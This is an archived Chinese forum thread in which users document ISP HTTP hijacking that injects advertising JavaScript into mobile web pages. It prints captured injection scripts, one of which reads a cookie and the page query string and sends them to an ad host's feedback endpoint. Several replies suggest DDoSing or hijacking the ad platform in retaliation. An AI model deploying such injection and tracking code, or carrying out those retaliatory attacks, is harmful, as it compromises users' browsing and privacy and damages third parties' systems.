这是一个创建于 2562 天前的主题,其中的信息可能已经有所发展或是发生改变。
我自己用电信宽带、移动宽带、移动 4G 都出现了不同程度的流量劫持,而且现在只劫持手机,基本不劫持电脑。这让这种问题很头疼。
至少今天深圳电信被我抓到了劫持 JS 的访问。专门用手机通过 Fiddler 来访问 HTTP 网站,果然抓到:
源地址: http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811
请求结果:
var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811';
_atn_obj_.unified_url = 'http://ntx.quanliyouxi.cn:2525/adv_select/ad_unified_access?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPycjLz8fNz7/OyczRmJuDzs7J0c3L0cnL0c7LzYPOg87PzcfOzoPPg8+DiIiI0ZmThpqNi5qe0ZyQkoPOys7Px8vMzszJg82DzM/Pzw==';
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);
多个 JS 都出现了类似的现象。有了证据,而且对方也是流氓(投诉多次,发现根本没用),有没有什么流氓的办法治呢?
至少今天深圳电信被我抓到了劫持 JS 的访问。专门用手机通过 Fiddler 来访问 HTTP 网站,果然抓到:
源地址: http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811
请求结果:
var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://ptf.flyert.com/template/zhikai_n5app/js/swipe.js?cHVzaA=102811';
_atn_obj_.unified_url = 'http://ntx.quanliyouxi.cn:2525/adv_select/ad_unified_access?SP=ABzs/PzoPOz83Lg7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPycjLz8fNz7/OyczRmJuDzs7J0c3L0cnL0c7LzYPOg87PzcfOzoPPg8+DiIiI0ZmThpqNi5qe0ZyQkoPOys7Px8vMzszJg82DzM/Pzw==';
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);
多个 JS 都出现了类似的现象。有了证据,而且对方也是流氓(投诉多次,发现根本没用),有没有什么流氓的办法治呢?
 |
1
matolv 2017-11-16 23:37:21 +08:00  1
流量劫持=GDP UP,曝光并没什么暖用,工信部表示规范市场全靠自觉,国家没有相关法律制裁此等行为。流氓办法就是 DDOS 直接打死
|
 |
2
pisser 2017-11-16 23:39:31 +08:00
无解,取证困难,利益链深。
|
 |
3
changwei 2017-11-16 23:41:11 +08:00 via Android
可以法庭起诉一波,估计能带来很大影响,,但是不知道有什么法律支持。
|
 |
4
yexm0 2017-11-16 23:43:03 +08:00 via iPhone
没有,而且深圳电信算是仁慈的了,深圳联通和移动连那些有名的 dns 地址也给你劫持掉的
|
 |
5
thetast OP |
|
6
thetast OP @yexm0 没错,移动还劫持了 DNS 地址。这个是很恶心的,NX DOMAIN 也是回来他们自己的页面。这的确很恶心。
|
 |
7
f2f2f 2017-11-16 23:47:37 +08:00
提速降费
羊毛出在羊身上 |
|
8
thetast OP @f2f2f 提速? 200M 宽带上行 4M,降费?深圳电信的宽带貌似大多数时候都是要接近 2000 一年,一个月 160+。看看对面香港,再对面台湾,貌似这不是理由。
感觉电信自己都不是很清楚这回事,要不就是有些人装傻了。 |
 |
9
qwvy2g 2017-11-17 00:12:53 +08:00 via Android
其实一直在想一个问题:以前看过有人用公司的网络挂挖币的设备,不知道运营商的家用宽带接入机房是怎么管理的?能否杜绝这种现象?
|
 |
10
phy25 2017-11-17 00:35:46 +08:00 via Android 2
这东西就像个人信息泄露一样,反正问题没大到危害国家安全生命安全,就慢慢来。
据说现在在准备运营商级别的「反劫持系统」检测劫持了。 |
|
11
thetast OP @qwvy2g 这个应该性质不同。
使用公司的网络挂挖币,如果公司是不允许这么做的,那么就应该算违反了公司使用网络的规定。 而对于家用宽带流量劫持,由于运营商提供的是家用宽带,网络服务,在中间加了流量劫持,那么就算是对网络链路中的内容进行了探测和更改。 |
 |
12
GooMS 2017-11-17 03:45:34 +08:00 via Android
今年 18 大不就出了劫持的政策
|
 |
13
LuvF 2017-11-17 08:43:16 +08:00
工信部
|
 |
14
liyvhg 2017-11-17 08:59:29 +08:00 via Android 1
劫持那个广告平台,重定向到轮子的网站,然后举报
|
 |
15
LanFomalhaut 2017-11-17 09:41:45 +08:00 1
每次看到这种话题 只想说 以暴制暴才是正道...什么投诉都是扯皮 临时几天白名单 又有何用..浪费时间精力 还影响心情: )
|
 |
17
miaomiao888 2017-11-17 10:56:06 +08:00
所以我现在 10M 对等 有公网没各种劫持 懒的升不敢升 宽带商提示升级的电话也懒的接
|
 |
18
580a388da131 2017-11-17 11:05:41 +08:00
没出什么幺蛾子,这种事情优先级不高,所以以后解决。
|
 |
19
sasalemma 2017-11-17 11:09:42 +08:00
大内网特色。另 301 劫持也是正常,下载 cdn 加速都加速到自家的服务节点,对于强迫症来说,我就是要 idm 从原网站拖软件,只能在夜深人静的时候,还有 https 伺候。人一多,出国端口带宽不够就可以大内网加速,很忧伤,都不知道那些文件是不是造假的。没有数字签名也没有 sha1 对照的很忧伤。
|
 |
20
anheiyouxia 2017-11-17 11:12:01 +08:00 via Android
@liyvhg 那到时候抓的就是你了😂
可以参考 2014 年温州有线电视被黑事件 |
 |
21
jy02201949 2017-11-17 11:32:45 +08:00
 那是没碰到领导的底线,上次把国务院的劫持了曝光不到一天就紧急处理掉 |
|
22
liyvhg 2017-11-17 11:43:30 +08:00 via Android
@anheiyouxia 那就换个思路,打开某些政府网站,例如领导人简历页面,截图被插入广告的证据然后举报,之前 v2 好像有人这么搞过?
|
 |
23
0hey0 2017-11-17 12:04:28 +08:00 via Android
罪名:破坏公共计算机安全罪
|
 |
24
mytsing520 2017-11-18 11:43:21 +08:00
接下来运营商会造管道级别的 CDN,大文件(主要是视频)运营商自己缓存,减少互联互通产生的流量成本(来自联通 CDN 白皮书)
|
 |
25
zhouyut001 2017-11-20 08:17:18 +08:00 via Android
@thetast 上传速度不是运营商说了算,国家的政策。你办理企业宽带就不会限制了
|
|
26
thetast OP @zhouyut001 没觉得啊,不同城市不同,加上企业宽带也有限制啊
|
|
27
thetast OP @mytsing520 CDN 没问题,如果 CDN 加速应该全世界都是有的。关键是劫持之后塞你自己的东西,那就太恶心了
|
|
28
zhouyut001 2017-11-22 15:15:46 +08:00 via Android
@thetast 重庆电信企业或者学校的专线是对的网络
|
 |
29
Esded 2017-12-08 04:23:17 +08:00
我这里是清远市,中国电信,两天宽带也出现这种情况,投诉无门,说是非电信类广告他们无法屏蔽。
还有在百度搜索的时候,打开其中搜索结果的页面,按返回时会跳到百度搜索用设定好的关键字进行搜索 我相信这是大范围全省的劫持,有必要开个专门讨论 quanliyouxi.cn 广告问题的贴 kio.quanliyouxi.cn183.59.53.189 3074110909 广东省梅州市 电信 kio.quanliyouxi.cn183.59.53.187 3074110907 广东省梅州市 电信 ntx.quanliyouxi.cn183.59.53.188 3074110908 广东省梅州市 电信 ntx.quanliyouxi.cn121.15.207.243 2031079411 广东省 电信 var _atn_obj_ = new Object; _atn_obj_.oldurl = 'http://js.t.sinajs.cn/open/thirdpart/js/pageapp/mobile/server.js?version=201606141500&cHVzaA=1512384756'; _atn_obj_.unified_url = 'http://kio.quanliyouxi.cn:2525/ad_unified_access?SP=ABys7Og8zPyM3OyM7Ly86gzc7Kz8uDrLLSuMbPz6+DzIPLy87Hz8+DzoPOys7NzMfLyMrJg87Kzs3Mx8vIysnPycbIz8zLg83NyMjJ'; window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0); window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0); function mycount_add_count(stype){ var script=document.createElement("script"); script.setAttribute("type", "text/javascript"); var URL = "http://kio.quanliyouxi.cn:2525/feedback"; var ck = getck("JSCOOKIEID"); if(ck == ""){ ck = "0"; } var path = ""; if (window.location.search == "") path = window.parent.location.search; else path = window.location.search; path=decodeURIComponent(path); path=path.replace(' ','+'); if (path != "") { path = URL + path + "&stype="+stype; } else { path = URL; } path += "&ak="+ck; script.setAttribute("src", path); var heads = document.getElementsByTagName("head"); if(heads.length) heads[0].appendChild(script); else document.documentElement.appendChild(script); } mycount_add_count(1); //关闭页面 function closePage(){ var userAgent = navigator.userAgent; if (userAgent.indexOf("Firefox") != -1 || userAgent.indexOf("Chrome") !=-1) { window.location.href="about:blank"; } else { window.close(); } } function getck(sname){//获取单个 cookies var acookie=document.cookie.split("; "); for(var i=0;i<acookie.length;i++){ var arr=acookie[i].indexOf("="); if(arr > 0){ var start = acookie[i].substring(0, arr); var end = acookie[i].substring(arr+1, acookie[i].length); if(sname==start){ return end; } }else{ return ""; } if(sname==arr[0]){ if(arr.length>1){ return unescape(arr[1]); }else{ } } } return ""; } |
|
30
Esded 2017-12-08 04:24:08 +08:00
我这里是清远市,中国电信,两条 宽带也出现这种情况,投诉无门,说是非电信类广告他们无法屏蔽。
|
 |
31
a86913179 2017-12-13 09:51:58 +08:00
http 劫持要解决,需要 linux 类网关 iptables drop 掉,dns 劫持需要非 53 端口,自己找台 VPS 架一个。其实最好的方法是买台线路好的 VPS 能跑满带宽的,直接全局代理!
|
|
32
thetast OP 最后的解决——投诉工信部,提供实锤,刚开始还赖说不是深圳的广告,最后还是给屏蔽了。
|
 |
33
kevin860 2018-05-25 06:01:35 +08:00
@thetast 发现我的网页也有这种劫持,不知道这种劫持的原理是什么,是从哪一步开始劫持的
出现这种网址在页面里 http://183.59.53.202:3535/adv_select/ad_unified_access?SP=ABzs/PzoPOz8/Ig7yXnpGRmpOgmJugy8vPzM/Pg86Dy8vPzM/Pg8/IysrPyMvJycnNyL/OyczRmJuDzs7M0cbN0c7KxtHNzM+DzoPNz8zGzsqDz4PPg4yXnpGYl4rRhpCKj56G0Zycg87KzcjOxsfOyMuDzoPP |
 |
34
worldtongfb 2020-06-22 16:00:44 +08:00
@kevin860 #33 今天发现这个问题, 深圳电信 http 会插入这个地址,方法就是返回内容的时候在 head 头插 script
这种方法只能对付 http 网站,https 解不出来就不行了 访问了下结果就是个标识 id,根据你的 ua 电脑上 js 会异常 其他的没影响,手极端估计就会跳广告了 |
Select Language